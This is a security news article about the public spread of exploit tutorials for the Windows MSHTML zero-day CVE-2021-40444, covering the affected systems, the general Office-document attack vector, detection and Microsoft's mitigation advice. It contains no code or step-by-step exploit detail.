Articles Exploit for 0-day vulnerability in Windows MSHTML published

Exploit for 0-day vulnerability in Windows MSHTML published


Researchers warn that cybercriminals are already sharing tutorials and exploits for the CVE-2021-40444 vulnerability on hacker forums, allowing more hackers to exploit the new vulnerability in their attacks.

Let me remind you that last week Microsoft  issued a warning  about a new zero-day vulnerability in Microsoft MHTML (aka Trident), the proprietary Internet Explorer browser engine. It has been reported that the issue is already being exploited in real attacks against Office 365 and Office 2019 users on Windows 10, but there is no patch for it yet.

The vulnerability affects Windows Server 2008-2019 and Windows 8.1-10 (8.8 out of 10 on the CVSS scale). Although MHTML was primarily used for the Internet Explorer browser, it is also used in Office applications to render web-based content within Word, Excel, and PowerPoint documents.

As Microsoft representatives explained, using this bug, an attacker can create a malicious ActiveX component that will be used by a Microsoft Office document and processed by MHTML. In fact, the attacker only has to convince the user to open such a malicious file, after which the attack can be considered a success.

Soon after this message from the IT giant, researchers warned that the problem could be more dangerous, since Protected View or Application Guard cannot always protect from its exploitation. In addition, the experts found that the vulnerability can also be exploited using RTF files, which are not protected by Office Protected View at all. We also noticed that the bug can be exploited through document previews.

Although the experts did not disclose the details of the methods used, fearing that they would be used by cybercriminals, the hackers were still able to reproduce the exploits on their own (based on information and samples of malicious documents available on the network). Now criminals are actively sharing detailed tutorials and information with each other on hacker forums, say Bleeping Computer journalists . So, additional instructions for creating payloads and a custom CAB file have already been published.

The information disseminated by cybercriminals is simple and allows anyone to create their own version of the exploit for CVE-2021-40444, including a Python server for distributing malicious documents and CAB files. For example, using this information, journalists were able to recreate the exploit in about 15 minutes, as shown in the video below.

The publication notes that currently Microsoft Defender and other security software can already detect and block malicious documents and CAB files used in attacks. Microsoft representatives, in turn, advised to disable ActiveX controls in Internet Explorer, and information security experts are now talking about the need to disable document preview in Explorer.

Must read

28 dangerous extensions detected for Google Chrome and Microsoft Edge

Avast experts have discovered malware hidden in at least 28 third-party...

Critical Infrastructure Warning! Millions of PLCs, switches, IoT devices are under threat

Eleven vulnerabilities, combined under the name Urgent / 11,...

Why Is It Important To Have Intrusion Detection And Prevention ?

This article describes why detection and prevention of burglaries...

The risk is real: attacks on OT infrastructure

Previously, many believed that attacks on an isolated OT...

Gitpaste-12: Linux bot armed with a dozen exploits

Researchers at Juniper Networks have discovered a Linux scripting...

Saferwall : Open Source Malware Analysis

Saferwall is an open source malware analysis platform. It...

Network Vulnerability Assessment ? Why Should Every Company Do it at least once a Year !

Network vulnerability assessment analyzes a variety of network issues,...

Artificial Intelligence and Cyber Security

As artificial intelligence intrudes into the world of cybersecurity,...

You might also likeRELATED
Recommended to you